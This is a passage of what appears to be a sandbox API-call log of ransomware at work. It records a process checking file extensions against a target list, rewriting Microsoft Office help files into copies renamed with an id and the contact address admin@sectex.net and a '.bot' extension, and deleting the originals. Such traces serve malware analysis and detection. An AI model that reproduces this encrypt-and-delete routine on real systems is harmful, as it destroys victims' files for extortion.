	[0152.838] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0152.838] lstrlenW (lpString=".rar") returned 4
	[0152.838] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0152.838] lstrlenW (lpString=".bz2") returned 4
	[0152.838] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0152.838] lstrlenW (lpString=".7z") returned 3
	[0152.838] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0152.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK") returned 63
	[0152.838] lstrlenW (lpString=".dbf") returned 4
	[0152.838] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0152.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK") returned 63
	[0152.838] lstrlenW (lpString=".1cd") returned 4
	[0152.838] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0152.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK") returned 63
	[0152.838] lstrlenW (lpString=".jpg") returned 4
	[0152.838] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0152.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK") returned 63
	[0152.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK") returned 63
	[0152.839] lstrlenW (lpString=".doc") returned 4
	[0152.839] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0152.839] lstrlenW (lpString=".docx") returned 5
	[0152.839] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0152.839] lstrlenW (lpString=".pdf") returned 4
	[0152.839] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0152.839] lstrlenW (lpString=".xls") returned 4
	[0152.839] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0152.839] lstrlenW (lpString=".xlsx") returned 5
	[0152.839] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0152.839] lstrlenW (lpString=".ppt") returned 4
	[0152.839] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0152.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK") returned 63
	[0152.839] lstrlenW (lpString=".zip") returned 4
	[0152.839] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0152.839] lstrlenW (lpString=".rar") returned 4
	[0152.839] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0152.839] lstrlenW (lpString=".bz2") returned 4
	[0152.839] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0152.839] lstrlenW (lpString=".7z") returned 3
	[0152.839] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0152.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK") returned 63
	[0152.839] lstrlenW (lpString=".dbf") returned 4
	[0152.839] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0152.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK") returned 63
	[0152.839] lstrlenW (lpString=".1cd") returned 4
	[0152.839] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0152.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK") returned 63
	[0152.839] lstrlenW (lpString=".jpg") returned 4
	[0152.839] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0152.840] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0152.840] lstrlenW (lpString="VISIO_K_COL.HXK") returned 15
	[0152.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.840] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=113) returned 1
	[0152.840] CloseHandle (hObject=0x2a0) returned 1
	[0152.840] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_k_col.hxk")) returned 0x20
	[0152.841] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.841] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.841] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0152.842] GetLastError () returned 0x0
	[0152.842] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x71, lpOverlapped=0x0) returned 1
	[0152.843] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0152.844] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.844] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0152.844] SetEndOfFile (hFile=0x384) returned 1
	[0152.844] CloseHandle (hObject=0x384) returned 1
	[0152.844] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.844] SetEndOfFile (hFile=0x2a0) returned 1
	[0152.847] CloseHandle (hObject=0x2a0) returned 1
	[0152.847] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.847] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_k_col.hxk")) returned 1
	[0152.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK") returned 63
	[0152.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK") returned 63
	[0152.848] lstrlenW (lpString=".doc") returned 4
	[0152.848] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0152.848] lstrlenW (lpString=".docx") returned 5
	[0152.848] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0152.848] lstrlenW (lpString=".pdf") returned 4
	[0152.848] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0152.848] lstrlenW (lpString=".xls") returned 4
	[0152.848] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0152.848] lstrlenW (lpString=".xlsx") returned 5
	[0152.848] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0152.848] lstrlenW (lpString=".ppt") returned 4
	[0152.848] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0152.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK") returned 63
	[0152.848] lstrlenW (lpString=".zip") returned 4
	[0152.848] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0152.848] lstrlenW (lpString=".rar") returned 4
	[0152.848] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0152.848] lstrlenW (lpString=".bz2") returned 4
	[0152.848] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0152.848] lstrlenW (lpString=".7z") returned 3
	[0152.848] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0152.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK") returned 63
	[0152.848] lstrlenW (lpString=".dbf") returned 4
	[0152.848] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0152.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK") returned 63
	[0152.848] lstrlenW (lpString=".1cd") returned 4
	[0152.848] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0152.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK") returned 63
	[0152.849] lstrlenW (lpString=".jpg") returned 4
	[0152.849] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0152.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK") returned 63
	[0152.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK") returned 63
	[0152.849] lstrlenW (lpString=".doc") returned 4
	[0152.849] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0152.849] lstrlenW (lpString=".docx") returned 5
	[0152.849] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0152.849] lstrlenW (lpString=".pdf") returned 4
	[0152.849] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0152.849] lstrlenW (lpString=".xls") returned 4
	[0152.849] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0152.849] lstrlenW (lpString=".xlsx") returned 5
	[0152.849] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0152.849] lstrlenW (lpString=".ppt") returned 4
	[0152.849] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0152.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK") returned 63
	[0152.849] lstrlenW (lpString=".zip") returned 4
	[0152.849] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0152.849] lstrlenW (lpString=".rar") returned 4
	[0152.849] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0152.849] lstrlenW (lpString=".bz2") returned 4
	[0152.849] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0152.849] lstrlenW (lpString=".7z") returned 3
	[0152.849] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0152.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK") returned 63
	[0152.849] lstrlenW (lpString=".dbf") returned 4
	[0152.849] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0152.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK") returned 63
	[0152.849] lstrlenW (lpString=".1cd") returned 4
	[0152.850] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0152.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK") returned 63
	[0152.850] lstrlenW (lpString=".jpg") returned 4
	[0152.850] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0152.850] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0152.850] lstrlenW (lpString="VISIO_PRM.HXS") returned 13
	[0152.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.850] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2287488) returned 1
	[0152.850] CloseHandle (hObject=0x2a0) returned 1
	[0152.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm.hxs")) returned 0x20
	[0152.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.851] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0152.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS") returned 61
	[0152.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS") returned 61
	[0152.851] lstrlenW (lpString=".doc") returned 4
	[0152.851] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0152.851] lstrlenW (lpString=".docx") returned 5
	[0152.851] lstrcmpiW (lpString1=".docx", lpString2="M.HXS") returned -1
	[0152.851] lstrlenW (lpString=".pdf") returned 4
	[0152.851] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0152.851] lstrlenW (lpString=".xls") returned 4
	[0152.851] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0152.851] lstrlenW (lpString=".xlsx") returned 5
	[0152.851] lstrcmpiW (lpString1=".xlsx", lpString2="M.HXS") returned -1
	[0152.851] lstrlenW (lpString=".ppt") returned 4
	[0152.851] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0152.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS") returned 61
	[0152.851] lstrlenW (lpString=".zip") returned 4
	[0152.851] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0152.851] lstrlenW (lpString=".rar") returned 4
	[0152.851] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0152.851] lstrlenW (lpString=".bz2") returned 4
	[0152.851] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0152.851] lstrlenW (lpString=".7z") returned 3
	[0152.851] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0152.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS") returned 61
	[0152.852] lstrlenW (lpString=".dbf") returned 4
	[0152.852] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0152.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS") returned 61
	[0152.852] lstrlenW (lpString=".1cd") returned 4
	[0152.852] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0152.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS") returned 61
	[0152.852] lstrlenW (lpString=".jpg") returned 4
	[0152.852] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0152.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS") returned 61
	[0152.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS") returned 61
	[0152.852] lstrlenW (lpString=".doc") returned 4
	[0152.852] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0152.852] lstrlenW (lpString=".docx") returned 5
	[0152.852] lstrcmpiW (lpString1=".docx", lpString2="M.HXS") returned -1
	[0152.852] lstrlenW (lpString=".pdf") returned 4
	[0152.852] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0152.852] lstrlenW (lpString=".xls") returned 4
	[0152.852] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0152.852] lstrlenW (lpString=".xlsx") returned 5
	[0152.852] lstrcmpiW (lpString1=".xlsx", lpString2="M.HXS") returned -1
	[0152.852] lstrlenW (lpString=".ppt") returned 4
	[0152.852] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0152.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS") returned 61
	[0152.852] lstrlenW (lpString=".zip") returned 4
	[0152.852] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0152.852] lstrlenW (lpString=".rar") returned 4
	[0152.852] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0152.852] lstrlenW (lpString=".bz2") returned 4
	[0152.852] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0152.852] lstrlenW (lpString=".7z") returned 3
	[0152.853] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0152.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS") returned 61
	[0152.853] lstrlenW (lpString=".dbf") returned 4
	[0152.853] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0152.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS") returned 61
	[0152.853] lstrlenW (lpString=".1cd") returned 4
	[0152.853] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0152.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS") returned 61
	[0152.853] lstrlenW (lpString=".jpg") returned 4
	[0152.853] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0152.853] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0152.853] lstrlenW (lpString="VISIO_PRM_COL.HXC") returned 17
	[0152.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.854] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=641) returned 1
	[0152.854] CloseHandle (hObject=0x2a0) returned 1
	[0152.854] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxc")) returned 0x20
	[0152.854] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.854] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.854] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0152.855] GetLastError () returned 0x0
	[0152.855] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x281, lpOverlapped=0x0) returned 1
	[0153.054] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x290, lpOverlapped=0x0) returned 1
	[0153.055] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.055] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0153.055] SetEndOfFile (hFile=0x384) returned 1
	[0153.055] CloseHandle (hObject=0x384) returned 1
	[0153.055] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.055] SetEndOfFile (hFile=0x2a0) returned 1
	[0153.057] CloseHandle (hObject=0x2a0) returned 1
	[0153.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.058] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxc")) returned 1
	[0153.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC") returned 65
	[0153.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC") returned 65
	[0153.058] lstrlenW (lpString=".doc") returned 4
	[0153.058] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0153.059] lstrlenW (lpString=".docx") returned 5
	[0153.059] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0153.059] lstrlenW (lpString=".pdf") returned 4
	[0153.059] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0153.059] lstrlenW (lpString=".xls") returned 4
	[0153.059] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0153.059] lstrlenW (lpString=".xlsx") returned 5
	[0153.059] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0153.059] lstrlenW (lpString=".ppt") returned 4
	[0153.059] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0153.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC") returned 65
	[0153.059] lstrlenW (lpString=".zip") returned 4
	[0153.059] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0153.059] lstrlenW (lpString=".rar") returned 4
	[0153.059] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0153.059] lstrlenW (lpString=".bz2") returned 4
	[0153.059] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0153.059] lstrlenW (lpString=".7z") returned 3
	[0153.059] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0153.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC") returned 65
	[0153.059] lstrlenW (lpString=".dbf") returned 4
	[0153.059] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0153.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC") returned 65
	[0153.059] lstrlenW (lpString=".1cd") returned 4
	[0153.059] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0153.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC") returned 65
	[0153.059] lstrlenW (lpString=".jpg") returned 4
	[0153.060] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0153.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC") returned 65
	[0153.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC") returned 65
	[0153.060] lstrlenW (lpString=".doc") returned 4
	[0153.060] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0153.060] lstrlenW (lpString=".docx") returned 5
	[0153.060] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0153.060] lstrlenW (lpString=".pdf") returned 4
	[0153.060] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0153.060] lstrlenW (lpString=".xls") returned 4
	[0153.060] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0153.060] lstrlenW (lpString=".xlsx") returned 5
	[0153.060] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0153.060] lstrlenW (lpString=".ppt") returned 4
	[0153.060] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0153.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC") returned 65
	[0153.060] lstrlenW (lpString=".zip") returned 4
	[0153.060] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0153.060] lstrlenW (lpString=".rar") returned 4
	[0153.060] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0153.060] lstrlenW (lpString=".bz2") returned 4
	[0153.060] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0153.060] lstrlenW (lpString=".7z") returned 3
	[0153.060] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0153.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC") returned 65
	[0153.060] lstrlenW (lpString=".dbf") returned 4
	[0153.060] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0153.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC") returned 65
	[0153.060] lstrlenW (lpString=".1cd") returned 4
